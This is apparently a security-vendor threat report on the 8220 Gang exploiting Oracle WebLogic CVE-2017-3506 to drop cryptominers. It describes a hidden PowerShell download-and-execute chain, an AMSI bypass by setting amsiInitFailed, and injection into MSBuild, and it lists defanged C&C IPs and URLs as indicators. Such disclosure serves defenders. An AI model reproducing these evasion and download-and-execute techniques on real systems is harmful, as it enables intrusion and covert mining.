We observed the threat actor group known as “8220 Gang” employing new strategies for their respective campaigns, including exploits for the Linux utility “lwp-download” and CVE-2017-3506, an Oracle WebLogic vulnerability.
Update as of 7/25/2023 3:40PM PHT: Updated the indicators of compromise.
8220 Gang (also known as “8220 Mining Group,” derived from their use of port 8220 for command and control or C&C communications exchange) has been active since 2017 and continues to scan for vulnerable applications in cloud and container environments. Researchers have documented this group targeting Oracle WebLogic, Apache Log4j, Atlassian Confluence vulnerabilities, and misconfigured Docker containers to deploy cryptocurrency miners in both Linux and Microsoft Windows hosts. The group was documented to have used Tsunami malware, XMRIG cryptominer, masscan, and spirit, among other tools in their campaigns.
Looking at other researchers’ documentation on the gang’s recent activities, it appears as if the threat actor has been active in recent months. This article explores a recent attack observed exploiting the Oracle WebLogic vulnerability CVE-2017-3506 captured by one of our honeypots. This vulnerability, with a CVSS score of 7.4, impacts the WLS Security Component of Oracle WebLogic, and when exploited can enable attackers to execute arbitrary commands through an HTTP request remotely with a specifically crafted XML document. This allows attackers to gain unauthorised access to sensitive data or compromise the entire system.
Entry point
Attackers exploited the HTTP URI (Uniform Resource Identifier) “wls-wsat/CoordinatorPortType” as an entry point to target an Oracle WebLogic server leveraging the CVE-2017-3506 vulnerability.
On entry, 8220 Gang delivered a PowerShell script that downloads and creates other dropper files using the said six-year old vulnerability. In recent attacks, we also observed the group using “lwp-download,” a Linux utility for downloading a file specified by the URL. In this entry, we detail another routine targeting Windows systems.
Infection routine
The attack payload executes a PowerShell command encoded using Base64. Upon decoding, it executes a command that opens a hidden PowerShell window (-NonI -W Hidden) with no profile loaded (-NoP), and bypasses execution policies (-Exec Bypass). The decoded command downloads and executes a PowerShell script from http[:]//185[.]17[.]0[.]199/bypass.ps1 without displaying any visible output to the user. The Base64-encoded string downloads a PowerShell script “bypass.ps1.”
Analysis of bypass.ps1
The PowerShell script decodes multiple Base64-encoded byte arrays to create another obfuscated PowerShell script in memory and executes it using “iex” (Invoke-Expression) commandlet.
All the variables assigned to byte arrays contain Base64-encoded strings (in this case, the $c byte array). These byte arrays are used later in the script for deobfuscation purposes. Once computation is done for the $cc variable, it stores the decoded value of the $c byte array, which is the PowerShell script that gets executed in memory without writing the script on the disk. Decoding the $c variable using ASCII, the result is identified as the $cc variable and executes the PowerShell script.
The new PowerShell script performs the following tasks:
1. It disables the AMSI detection. The code sets the value of “amsiInitFailed” field from <System.Management.Automation.AmsiUtils> class to “True” to achieve AMSI unhooking so that no scanning action will be done for the current process. To update the value of “amsiInitFaild,” it uses .NET reflection to assign a value of “True,” as observed in the bypass command.
2. After disabling AMSI detection, it defines the path to write the malicious binary file into the Windows “temp” directory.
3. Next, it writes the binary file in the specified in the “$eXE_PaTh” variable. This code section decodes the Base64 string into a byte array, which is a binary code, and uses .Net class System.IO to write the binary file on the disk.
4. At the end of the script, the PowerShell executes the newly written binary file in the Windows “temp” directory using the “-WindowStyle Hidden” parameter in the command without displaying any user interface.
The file “Winscp-setup-1867.exe” is responsible for downloading the file “Ebvjmba.dat” by continuously sending a GET request to its server http[:]//79[.]137[.]203[.]156/Ebvjmba.dat. After executing Winscp-setup-1867.exe, a DLL file contacts the file server to download the DAT file dropper from 79[.]137[.]203[.]156, which is an IP address we determined to be the C&C server. The DLL file uses the .NET framework’s “HttpClient” class to send an HTTP GET request to the specified asset URL.
This dropper only has a Base64-encoded string of a binary code in reverse to evade detection.
The newly created .dll file is an encrypted resource file that is injected into the MS Build process. The file is meticulously obfuscated, adding an extra layer of complexity for analysts. After inspecting the process’ memory, we found that the configuration information of the injected payload is Base64-encoded and the new process communicates with one of the three C&Cs using TCP ports 9090, 9091, or 9092 to download a cryptocurrency miner:
- 179[.]43[.]155[.]202
- work[.]letmaker[.]top
- su-94[.]letmaker[.]top
Conclusion
lwp-download is a Linux utility present in a number of platforms by default, and 8220 Gang making this a part of any malware routine can affect a number of services even if it were reused more than once. Considering the threat actor’s tendency to reuse tools for different campaigns and abuse legitimate tools as part of the arsenal, organizations’ security teams might be challenged to find other detection and blocking solutions to fend off attacks that abuse this utility.
Abuse of lwp-download might be expected in the short term for compromise and targeting of other platforms. Despite reusing old tools and C&C servers, the gang has started targeting Windows systems, and using new file and C&C servers to evade previous detections. Moreover, while it would also initially seem counterintuitive to use a six-year-old security gap in an attack, the malicious actor’s scanning activity could have shown systems still vulnerable to the exploit.
Considering these developments, we find 8220 Gang as a threat to be reckoned with despite other researchers describing them as “low-level script kiddies,” and that organizations still have to work on catching up when it comes to updating their security systems. In the group’s previous deployments, earlier scripts they used were simple, unable to evade detection, and were easy to analyze. Over time, it included significantly damaging pieces of malware (such as Tsunami malware) in respective campaigns. We will continue monitoring this group and their respective deployments for analysis, detection, and blocking.
Trend Micro solutions
Trend Cloud One™ – Endpoint Security and Workload Security protect endpoints, servers, and cloud workloads through unified visibility, management, and role-based access control. These services provide specialized security optimized for your diverse endpoint and cloud environments, which eliminate the cost and complexity of multiple point solutions.
Indicators of Compromise (IOCs)
| SHA256 | File name/Description | Detection |
|---|---|---|
| b5fa13d8a03e9a38995e1a087f873e9f2e5d53d8ac713ffb951f62084c810a90 | bypass.ps1 | Trojan.MSIL.DROPPER.BS |
URLs and IPs
- http[:]//79[.]137[.]203[.]156/Ebvjmba.dat
- http[:]//185[.]17[.]0[.]19/bypass.ps1
- http[:]//185[.]17[.]0[.]19/Nmfwg.png
- 185[.]17[.]0[.]19
- 194[.]38[.]23[.]170
- 201[.]71[.]165[.]153
- 179[.]43[.]155[.]202
- Work[.]letmaker[.]top
- su-94[.]letmaker[.]top
MITRE ATT&CK
Source: https://www.trendmicro.com/en_us/research/23/e/8220-gang-evolution-new-strategies-adapted.html